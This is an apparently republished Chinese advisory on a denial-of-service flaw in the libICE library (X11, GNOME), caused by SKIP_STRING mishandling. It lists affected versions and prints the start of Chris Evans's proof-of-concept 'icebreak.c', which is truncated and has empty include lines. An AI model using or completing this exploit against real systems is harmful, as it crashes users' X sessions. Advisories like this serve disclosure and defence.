對(duì)libICE 庫(kù)拒絕服務(wù)攻擊漏洞的深入解析
此文章主要講述的是libICE 庫(kù)拒絕服務(wù)攻擊漏洞,如果你對(duì)libICE 庫(kù)拒絕服務(wù)攻擊漏洞有興趣的話,你就可以對(duì)以下的文章點(diǎn)擊觀看了,以下就是具體內(nèi)容的描述,希望在你今后的學(xué)習(xí)中會(huì)有所幫助。
受影響系統(tǒng):
GNOME Gnome 1.1
GNOME GNOME 1.0.x
Open Group X 11.0R6.x
Open Group X 11.0R6
Open Group X 11.0R5
XFree86 X11R6 4.0
XFree86 X11R6 3.3.6
- RedHat Linux 6.2 i386
XFree86 X11R6 3.3.5
- RedHat Linux 6.1 i386
XFree86 X11R6 3.3.4
XFree86 X11R6 3.3.3
不受影響系統(tǒng):
GNOME Gnome 1.2
描述:
libICE是X11 window系統(tǒng)的一部分。由于在處理SKIP_STRING宏的時(shí)候存在一些問(wèn)題,導(dǎo)致
任何使用libICE創(chuàng)建監(jiān)聽(tīng)socket的應(yīng)用程序都可以被遠(yuǎn)程攻擊,使之停止服務(wù)。攻擊者可以
給skip提供一個(gè)很大的值,使指針指向某些未初始化的內(nèi)存區(qū)域,從而發(fā)生段訪問(wèn)錯(cuò)誤。
GNOME中大量的使用了libICE,因此攻擊者可能對(duì)正在運(yùn)行GNOME的用戶的X會(huì)話發(fā)動(dòng)攻擊。
<* 來(lái)源:Chris Evans *>
測(cè)試方法:
警 告
以下程序(方法)可能帶有攻擊性,僅供安全研究與教學(xué)之用。使用者風(fēng)險(xiǎn)自負(fù)!
/* icebreak.c - Chris Evans */
#include
#include
#include
int
main(int argc, const char* argv[])
{
unsigned char c;
unsigned int i;
unsigned short s;
char blankbuf[1000];
memset(blankbuf, '\0', sizeof(blankbuf));
/* Assume fd 1 is stdout */
/* ICE connection header */
/* First, pick an endian-ness */
/* Byte 1: Major opcode. Must be 0 */
c = 0;
write(1, &c, 1);
/* Byte 2: Minor opcode. Must be ICE_ByteOrder (1) */
以上的相關(guān)內(nèi)容就是對(duì)libICE 庫(kù)拒絕服務(wù)攻擊漏洞的介紹,望你能有所收獲。
上述的相關(guān)內(nèi)容就是對(duì)libICE 庫(kù)拒絕服務(wù)攻擊漏洞的描述,希望會(huì)給你帶來(lái)一些幫助在此方面。
【編輯推薦】